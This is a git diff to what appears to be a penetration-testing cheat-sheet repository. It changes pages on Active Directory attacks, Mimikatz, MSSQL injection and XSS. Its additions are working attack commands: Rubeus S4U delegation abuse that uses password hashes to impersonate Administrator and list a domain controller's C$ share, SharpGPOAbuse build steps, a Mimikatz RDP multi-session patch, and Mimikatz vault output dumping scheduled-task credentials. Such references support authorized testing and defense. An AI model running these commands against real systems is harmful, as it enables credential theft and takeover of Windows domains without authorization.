diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 489fcd1..b6539e7 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -407,6 +407,11 @@ Get-NetGPOGroup ### Exploit Group Policy Objects GPO ```powershell +# Build and configure SharpGPOAbuse +git clone https://github.com/FSecureLABS/SharpGPOAbuse +Install-Package CommandLineParser -Version 1.9.3.15 +ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.dll + # Adding User Rights SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO" @@ -1250,7 +1255,9 @@ Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Saving ticket in Administrator.ccache # Exploit with Rubeus -$ rubeus s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt +$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt +$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /ptt +$ dir \\dc.domain.com\c$ ``` diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index ff34988..46682b9 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -2,15 +2,16 @@ ## Summary -* [Mimikatz - Execute commands](#) -* [Mimikatz - Extract passwords](#) -* [Mimikatz - Mini Dump](#) -* [Mimikatz - Golden ticket](#) -* [Mimikatz - Skeleton key](#) -* [Mimikatz - RDP session takeover](#) -* [Mimikatz - Credential Manager & DPAPI](#) -* [Mimikatz - Commands list](#) -* [Mimikatz - Powershell version](#) +* [Mimikatz - Execute commands](#mimikatz---execute-commands) +* [Mimikatz - Extract passwords](#mimikatz---extract-passwords) +* [Mimikatz - Mini Dump](#mimikatz---mini-dump) +* [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash) +* [Mimikatz - Golden ticket](#mimikatz---golden-ticket) +* [Mimikatz - Skeleton key](#mimikatz---skeleton-key) +* [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover) +* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi) +* [Mimikatz - Commands list](#mimikatz---commands-list) +* [Mimikatz - Powershell version](#mimikatz---powershell-version) * [References](#references) ![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png) @@ -109,6 +110,8 @@ rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab ## Mimikatz - RDP session takeover +Use `ts::multirdp` to patch the RDP service to allow more than two users. + Run tscon.exe as the SYSTEM user, you can connect to any session without a password. ```powershell @@ -125,6 +128,8 @@ net start sesshijack ``` + + ## Mimikatz - Credential Manager & DPAPI ```powershell @@ -141,6 +146,21 @@ $ mimikatz !sekurlsa::dpapi $ mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b ``` +Task Scheduled credentials + +```powershell +mimikatz(commandline) # vault::cred /patch +TargetName : Domain:batch=TaskScheduler:Task:{CF3ABC3E-4B17-ABCD-0003-A1BA192CDD0B} / +UserName : DOMAIN\user +Comment : +Type : 2 - domain_password +Persist : 2 - local_machine +Flags : 00004004 +Credential : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +Attributes : 0 +``` + + ## Mimikatz - Commands list | Command |Definition| diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 2be3918..35836c8 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -239,4 +239,5 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/) * [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf) * [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links) -* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/) \ No newline at end of file +* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/) +* [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT) \ No newline at end of file diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 23db803..7b28ee9 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -10,7 +10,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Javascript keylogger](#javascript-keylogger) - [Other ways](#other-ways) - [Identify an XSS endpoint](#identify-an-xss-endpoint) -- [XSS in HTML/Applications](#xss-in-llapplications) +- [XSS in HTML/Applications](#xss-in-htmlapplications) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) - [XSS in PostMessage](#xss-in-postmessage)